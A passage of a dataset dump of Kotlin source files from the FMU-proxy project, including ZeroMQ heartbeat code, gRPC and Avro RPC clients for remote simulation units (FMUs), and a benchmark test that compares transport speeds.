= null\n\n private val isRunning: Boolean\n get() = inner != null\n\n fun start() {\n if (!isRunning) {\n inner = InnerClass()\n LOG.debug(\"${javaClass.simpleName} started!\")\n }\n }\n\n fun stop() {\n if (isRunning) {\n inner!!.stop()\n LOG.debug(\"${javaClass.simpleName} stopped!\")\n }\n }\n\n override fun close() {\n stop()\n }\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(Heartbeat::class.java)\n }\n\n private inner class InnerClass : Runnable {\n\n private val thread: Thread\n private var stop = false\n private val ctx: ZContext = ZContext(1)\n private val gson: Gson = GsonBuilder().create()\n\n init {\n thread = Thread(this)\n thread.start()\n }\n\n fun stop() {\n stop = true\n ctx.close()\n thread.join()\n }\n\n private fun workerSocket(ctx: ZContext): ZMQ.Socket {\n return ctx.createSocket(ZMQ.DEALER).also { worker ->\n worker.identity = remoteFmu.guid.toByteArray(ZMQ.CHARSET)\n worker.connect(\"tcp://${remoteAddress.host}:${remoteAddress.port}\")\n\n ZMsg().apply {\n add(PPP_READY)\n add(gson.toJson(remoteFmu).toByteArray(ZMQ.CHARSET))\n send(worker)\n }\n\n }\n\n }\n\n override fun run() {\n\n try {\n\n var worker = workerSocket(ctx)\n val poller = ctx.createPoller(1).apply {\n register(worker, ZMQ.Poller.POLLIN)\n }\n\n // If liveness hits zero, queue is considered disconnected\n var liveness = HEARTBEAT_LIVENESS\n var interval = INTERVAL_INIT\n\n // Send out heartbeats at regular intervals\n var heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n\n while (!stop) {\n\n if (poller.poll(HEARTBEAT_INTERVAL) == -1) break // Interrupted\n\n if (poller.pollin(0)) {\n val msg = ZMsg.recvMsg(worker) ?: break // Interrupted\n when (msg.size) {\n 1 -> {\n val frame = msg.first\n if (PPP_HEARTBEAT == String(frame.data)) {\n liveness = HEARTBEAT_LIVENESS\n } else {\n LOG.warn(\"E: invalid message\\n\")\n msg.dump(System.out)\n }\n msg.destroy()\n }\n else -> {\n LOG.warn(\"E: invalid message\\n\")\n msg.dump(System.out)\n }\n }\n interval = INTERVAL_INIT\n } else if (--liveness == 0L) {\n\n LOG.debug(\"FmuHeartbeat failure, can't reach remote @ $remoteAddress, \\n reconnecting in $interval msec\")\n\n Thread.sleep(interval)\n if (interval < INTERVAL_MAX) {\n interval *= 2\n }\n\n poller.unregister(worker)\n ctx.destroySocket(worker)\n worker = workerSocket(ctx)\n poller.register(worker, ZMQ.Poller.POLLIN)\n liveness = HEARTBEAT_LIVENESS\n }\n\n if (System.currentTimeMillis() > heartbeatAt) {\n heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n ZFrame(PPP_HEARTBEAT).apply {\n send(worker, 0 )\n }\n }\n\n }\n\n } catch (ex: Exception) {\n LOG.debug(\"Caught exception\", ex)\n }\n\n }\n }\n\n}\n\n\n" }, { "alpha_fraction": 0.49210846424102783, "alphanum_fraction": 0.49669498205184937, "avg_line_length": 29.2612247467041, "blob_id": "5753c5c7be593eb28b974c35ab8a7ef983c0d40b", "content_id": "9fac0ecb74194a256a099ae6033edc9d230ab6cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 7413, "license_type": "permissive", "max_line_length": 107, "num_lines": 245, "path": "/java/FMU-proxy/web/src/main/kotlin/no/mechatronics/sfi/fmuproxy/web/fmu/FmuService.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to 
deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.web.fmu\n\nimport com.google.gson.GsonBuilder\nimport no.mechatronics.sfi.fmuproxy.web.ServletContextListenerImpl\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport org.zeromq.ZContext\nimport org.zeromq.ZFrame\nimport org.zeromq.ZMQ\nimport org.zeromq.ZMsg\nimport java.io.Serializable\nimport java.util.*\nimport javax.annotation.PostConstruct\nimport javax.faces.bean.ApplicationScoped\nimport javax.faces.bean.ManagedBean\nimport kotlin.collections.HashSet\n\nprivate const val HEARTBEAT_LIVENESS = 3L // 3-5 is reasonable\nprivate const val HEARTBEAT_INTERVAL = 1000L // msecs\n\nprivate const val PPP_READY = \"\\u0001\" // Signals worker is ready\nprivate const val PPP_HEARTBEAT = \"\\u0002\" // Signals worker heartbeat\n\nprivate const val PORT = 7000\n\n\n/**\n * @author Lars Ivar Hatledal\n */\n@ManagedBean(eager = true)\n@ApplicationScoped\nclass FmuService: Serializable {\n\n val fmus: MutableSet<RemoteFmu> = Collections.synchronizedSet(HashSet())\n\n @Transient\n private var beat: Heartbeat? = null\n\n init {\n INSTANCE = this\n }\n\n @PostConstruct\n fun init() {\n if (beat == null) {\n beat = Heartbeat(PORT).apply {\n start()\n LOG.info(\"FmuService heartbeat started\")\n }\n\n ServletContextListenerImpl.onDestroy {\n beat?.stopBlocking()\n LOG.info(\"FmuService heartbeat stopped\")\n }\n }\n\n }\n\n fun add(fmu: RemoteFmu): Boolean {\n synchronized(fmus) {\n return fmus.add(fmu)\n }\n }\n\n fun remove(guid: String): Boolean {\n synchronized(fmus) {\n for (fmu in fmus) {\n if (fmu.guid == guid) {\n return fmus.remove(fmu)\n }\n }\n }\n return false\n }\n\n\n companion object {\n\n private val LOG: Logger = LoggerFactory.getLogger(FmuService::class.java)\n\n internal lateinit var INSTANCE: FmuService\n\n }\n\n\n private inner class Heartbeat(\n private val port: Int\n ) {\n\n private var stop: Boolean = false\n private var thread: Thread? 
= null\n private val gson = GsonBuilder().create()\n private val workers: MutableMap<String, Worker> = HashMap()\n\n fun start() {\n\n if (thread == null) {\n\n thread = Thread{\n\n ZContext().use { ctx ->\n\n val backend = ctx.createSocket(ZMQ.ROUTER).apply {\n rcvHWM = 1\n bind(\"tcp://*:$port\")\n }\n val poller = ctx.createPoller(1).apply {\n register(ZMQ.PollItem(backend, ZMQ.Poller.POLLIN))\n }\n\n var heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n\n while (!stop) {\n\n if (poller.poll(HEARTBEAT_INTERVAL) == -1) {\n break\n }\n\n if (poller.pollin(0)) {\n\n val msg = ZMsg.recvMsg(backend) ?: break // Interrupted\n\n val address: ZFrame = msg.unwrap()\n val uuid = String(address.data, ZMQ.CHARSET)\n\n if (String(msg.first.data, ZMQ.CHARSET) == PPP_READY) {\n\n val data = String(msg.last.data, ZMQ.CHARSET)\n val remoteFmu = gson.fromJson(data, RemoteFmu::class.java).apply {\n init()\n }\n\n if (add(remoteFmu)) {\n LOG.info(\"FMU $remoteFmu connected!\")\n workers[uuid] = Worker(address)\n }\n\n }\n\n if (uuid in workers) {\n workers[uuid]!!.updateExpiry()\n }\n\n msg.destroy()\n\n }\n\n if (System.currentTimeMillis() >= heartbeatAt) {\n for (worker in workers.values) {\n\n worker.address.send(backend,\n ZFrame.REUSE + ZFrame.MORE)\n val frame = ZFrame(PPP_HEARTBEAT)\n frame.send(backend, 0)\n\n }\n heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n }\n\n purge(workers)\n\n }\n\n workers.clear()\n\n }\n\n }.apply { start() }\n }\n\n }\n\n fun stop() {\n thread?.apply {\n stop = true\n }\n }\n\n fun stopBlocking() {\n thread?.apply {\n stop = true\n join()\n }\n }\n\n private fun purge(workers: MutableMap<String, Worker>) {\n val it = workers.entries.iterator()\n while (it.hasNext()) {\n val next = it.next()\n val worker = next.value\n\n if (System.currentTimeMillis() > worker.expiry) {\n val guid: String = next.key\n if (remove(guid)) {\n LOG.info(\"{}, disconnected!\", guid)\n }\n it.remove()\n }\n }\n }\n\n inner class Worker(\n internal val address: ZFrame // Address of worker\n ) {\n var expiry: Long // Expires at this time\n\n init {\n expiry = nextExpiry()\n }\n\n private fun nextExpiry() = System.currentTimeMillis() + HEARTBEAT_INTERVAL * HEARTBEAT_LIVENESS\n\n fun updateExpiry() {\n expiry = nextExpiry()\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.621351420879364, "alphanum_fraction": 0.6227304339408875, "avg_line_length": 34.08871078491211, "blob_id": "79312730f8fb5beb12d0e790e4412a315ffaa670", "content_id": "2f0c7031da7ef01125e86cfc2adcbc41b60b0ecc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 8702, "license_type": "permissive", "max_line_length": 109, "num_lines": 248, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/grpc/GrpcFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included 
in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc\n\n\nimport com.google.protobuf.Empty\nimport io.grpc.ManagedChannel\nimport io.grpc.ManagedChannelBuilder\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.RpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.Solver\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\nprivate val EMPTY = Empty.getDefaultInstance()\n\n\n/**\n * @author Lars Ivar Hatledal\n */\nclass GrpcFmuClient(\n host: String,\n port: Int\n): RpcFmuClient() {\n\n private val channel: ManagedChannel = ManagedChannelBuilder\n .forAddress(host, port)\n .usePlaintext()\n .directExecutor()\n .build()\n\n private val blockingStub: FmuServiceGrpc.FmuServiceBlockingStub = FmuServiceGrpc.newBlockingStub(channel)\n\n override val modelDescription: CommonModelDescription by lazy {\n blockingStub.getModelDescription(EMPTY).convert()\n }\n\n override val modelDescriptionXml: String by lazy {\n blockingStub.getModelDescriptionXml(EMPTY).value\n }\n \n override fun getCurrentTime(fmuId: Int): Double {\n return blockingStub.getCurrentTime(fmuId.asProtoUInt()).value\n }\n\n override fun isTerminated(fmuId: Int): Boolean {\n return blockingStub.isTerminated(fmuId.asProtoUInt()).value\n }\n\n override fun init(fmuId: Int, start: Double, stop: Double): FmiStatus {\n return Proto.InitRequest.newBuilder()\n .setFmuId(fmuId)\n .setStart(start)\n .setStop(stop)\n .build().let {\n blockingStub.init(it).convert()\n }\n }\n\n override fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus> {\n return Proto.StepRequest.newBuilder()\n .setFmuId(fmuId)\n .setStepSize(stepSize)\n .build().let {\n blockingStub.step(it).let { \n it.simulationTime to it.status.convert()\n }\n }\n }\n\n override fun reset(fmuId: Int): FmiStatus {\n return blockingStub.reset(fmuId.asProtoUInt()).convert()\n }\n\n override fun terminate(fmuId: Int): FmiStatus {\n return blockingStub.terminate(fmuId.asProtoUInt()).convert()\n }\n\n override fun readInteger(fmuId: Int, vr: Int): FmuIntegerRead {\n return blockingStub.readInteger(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead {\n return blockingStub.bulkReadInteger(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun readReal(fmuId: Int, vr: Int): FmuRealRead {\n return blockingStub.readReal(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead {\n return blockingStub.bulkReadReal(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun readString(fmuId: Int, vr: Int): FmuStringRead {\n return blockingStub.readString(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead {\n return blockingStub.bulkReadString(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun readBoolean(fmuId: Int, vr: Int): FmuBooleanRead 
{\n return blockingStub.readBoolean(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead {\n return blockingStub.bulkReadBoolean(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n return Proto.WriteIntRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeInteger(it).convert()\n }\n }\n\n override fun bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus {\n return Proto.BulkWriteIntRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteInteger(it).convert()\n }\n }\n\n override fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus {\n return Proto.WriteRealRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeReal(it).convert()\n }\n }\n\n override fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus {\n return Proto.BulkWriteRealRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteReal(it).convert()\n }\n }\n\n override fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n return Proto.WriteStrRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeString(it).convert()\n }\n }\n\n override fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus {\n return Proto.BulkWriteStrRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteString(it).convert()\n }\n }\n\n override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus {\n return Proto.WriteBoolRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeBoolean(it).convert()\n }\n }\n\n override fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus {\n return Proto.BulkWriteBoolRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteBoolean(it).convert()\n }\n }\n\n override fun createInstanceFromCS(): Int {\n return blockingStub.createInstanceFromCS(EMPTY).value\n }\n\n override fun createInstanceFromME(solver: Solver): Int {\n return blockingStub.createInstanceFromME(solver.protoType()).value\n }\n\n override fun close() {\n super.close()\n channel.shutdownNow()\n }\n\n\n private companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(GrpcFmuClient::class.java)\n\n private fun getReadRequest(fmuId: Int, vr: Int): Proto.ReadRequest {\n return Proto.ReadRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .build()\n }\n\n private fun getReadRequest(fmuId: Int, vr: List<Int>): Proto.BulkReadRequest {\n return Proto.BulkReadRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .build()\n }\n\n }\n\n}\n" }, { "alpha_fraction": 0.606921911239624, "alphanum_fraction": 0.615042507648468, "avg_line_length": 28.392045974731445, "blob_id": "46ba49ba114547d15634e5576d51ea83fc8e5a86", "content_id": "0e154a062bfc56938d6064ca75e0bd17216dc53f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", 
"length_bytes": 5172, "license_type": "permissive", "max_line_length": 125, "num_lines": 176, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/Benchmark.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.net.http.RpcHttpClient\nimport info.laht.yajrpc.net.tcp.RpcTcpClient\nimport info.laht.yajrpc.net.ws.RpcWebSocketClient\nimport info.laht.yajrpc.net.zmq.RpcZmqClient\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuClient\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.*\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuClient\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuServer\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass Benchmark {\n\n companion object {\n\n private val LOG: Logger = LoggerFactory.getLogger(Benchmark::class.java)\n\n private const val dt = 1E-4\n private const val stop = 20.0\n\n private val fmuPath = File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/20sim/4.6.4.8004/ControlledTemperature/ControlledTemperature.fmu\")\n\n }\n\n private val fmu = Fmu.from(fmuPath)\n\n @AfterAll\n fun tearDown() {\n fmu.close()\n }\n\n @Test\n fun measureTimeLocal() {\n\n fmu.asCoSimulationFmu().newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.variableAccessor.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"Local duration=${it}ms\")\n }\n }\n\n }\n\n\n @Test\n fun measureTimeThrift() {\n\n val server = ThriftFmuServer(fmu)\n val port = server.start()\n\n val client = ThriftFmuClient(\"localhost\", port)\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"Thrift duration=${it}ms\")\n }\n }\n\n client.close()\n server.close()\n\n }\n\n @Test\n fun measureTimeAvro() {\n\n val server = AvroFmuServer(fmu)\n val port = server.start()\n\n val client = AvroFmuClient(\"localhost\", port)\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"Avro duration=${it}ms\")\n }\n }\n\n client.close()\n server.close()\n\n }\n\n @Test\n fun measureTimeGrpc() {\n\n val server = GrpcFmuServer(fmu)\n val port = server.start()\n\n val client = GrpcFmuClient(\"localhost\", port)\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n 
Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"gRPC duration=${it}ms\")\n }\n }\n\n client.close()\n server.close()\n\n }\n\n @Test\n fun measureTimeJson() {\n\n val wsPort = 8001\n val tcpPort = 8002\n val zmqPort = 8003\n val httpPort = 8004\n\n val handler = RpcHandler(RpcFmuService(fmu))\n\n val servers = listOf(\n FmuProxyJsonHttpServer(handler).apply { start(httpPort) },\n FmuProxyJsonWsServer(handler).apply { start(wsPort) },\n FmuProxyJsonTcpServer(handler).apply { start(tcpPort) },\n FmuProxyJsonZmqServer(handler).apply { start(zmqPort) }\n )\n\n val host = \"localhost\"\n val clients = listOf(\n RpcHttpClient(host, httpPort),\n RpcWebSocketClient(host, wsPort),\n RpcTcpClient(host, tcpPort),\n RpcZmqClient(host, zmqPort)\n ).map { JsonRpcFmuClient(it) }\n\n clients.forEach { client ->\n\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"${client.client.javaClass.simpleName} duration=${it}ms\")\n }\n }\n\n client.close()\n\n }\n\n servers.forEach { it.close() }\n\n }\n\n}" }, { "alpha_fraction": 0.7011661529541016, "alphanum_fraction": 0.70298832654953, "avg_line_length": 34.41290283203125, "blob_id": "5d6ed5de4e0c2fbe9f582d1df1c4514d0b11be42", "content_id": "2b556c71bd23af37394a98207f576f6c084c3da8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5488, "license_type": "permissive", "max_line_length": 95, "num_lines": 155, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/AvroFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.avro\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.RpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.Solver\nimport org.apache.avro.ipc.NettyTransceiver\nimport org.apache.avro.ipc.specific.SpecificRequestor\nimport java.net.InetSocketAddress\n\n\nclass AvroFmuClient(\n host: String,\n port: Int\n): RpcFmuClient() {\n\n private val client = NettyTransceiver(InetSocketAddress(host, port))\n private val service = SpecificRequestor.getClient(AvroFmuService::class.java, client)\n\n override val modelDescription: CommonModelDescription by lazy {\n service.modelDescription.convert()\n }\n\n override val modelDescriptionXml: String by lazy {\n service.modelDescriptionXml\n }\n\n override fun getCurrentTime(fmuId: Int): Double {\n return service.getCurrentTime(fmuId)\n }\n\n override fun isTerminated(fmuId: Int): Boolean {\n return service.isTerminated(fmuId)\n }\n\n override fun init(fmuId: Int, start: Double, stop: Double): FmiStatus {\n return service.init(fmuId, start, stop).convert()\n }\n\n override fun terminate(fmuId: Int): FmiStatus {\n return service.terminate(fmuId).convert()\n }\n\n override fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus> {\n return service.step(fmuId, stepSize).let {\n it.simulationTime to it.status.convert()\n }\n }\n\n override fun reset(fmuId: Int): FmiStatus {\n return service.reset(fmuId).convert()\n }\n\n override fun readInteger(fmuId: Int, vr: Int): FmuIntegerRead {\n return service.readInteger(fmuId, vr).convert()\n }\n\n override fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead {\n return service.bulkReadInteger(fmuId, vr).convert()\n }\n\n override fun readReal(fmuId: Int, vr: Int): FmuRealRead {\n return service.readReal(fmuId, vr).convert()\n }\n\n override fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead {\n return service.bulkReadReal(fmuId, vr).convert()\n }\n\n override fun readString(fmuId: Int, vr: Int): FmuStringRead {\n return service.readString(fmuId, vr).convert()\n }\n\n override fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead {\n return service.bulkReadString(fmuId, vr).convert()\n }\n\n override fun readBoolean(fmuId: Int, vr: Int): FmuBooleanRead {\n return service.readBoolean(fmuId, vr).convert()\n }\n\n override fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead {\n return service.bulkReadBoolean(fmuId, vr).convert()\n }\n\n override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n return service.writeInteger(fmuId, vr, value).convert()\n }\n\n override fun bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus {\n return service.bulkWriteInteger(fmuId, vr, value).convert()\n }\n\n override fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus {\n return service.writeReal(fmuId, vr, value).convert()\n }\n\n override fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus {\n return service.bulkWriteReal(fmuId, vr, value).convert()\n }\n\n override fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n return service.writeString(fmuId, 
vr, value).convert()\n }\n\n override fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus {\n return service.bulkWriteString(fmuId, vr, value).convert()\n }\n\n override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus {\n return service.writeBoolean(fmuId, vr, value).convert()\n }\n\n override fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus {\n return service.bulkWriteBoolean(fmuId, vr, value).convert()\n }\n\n override fun createInstanceFromCS(): Int {\n return service.createInstanceFromCS()\n }\n\n override fun createInstanceFromME(solver: Solver): Int {\n return service.createInstanceFromME(solver.avroType())\n }\n\n override fun close() {\n super.close()\n client.close()\n }\n\n}" }, { "alpha_fraction": 0.5856621861457825, "alphanum_fraction": 0.587918758392334, "avg_line_length": 35.69426727294922, "blob_id": "c8d5881063914efaa347ccdfc45d8d14a98a7c0d", "content_id": "dd207dc715bcc977d5a3ff0332750cfb137bfac3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5761, "license_type": "permissive", "max_line_length": 130, "num_lines": 157, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/ExecutableGenerator.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
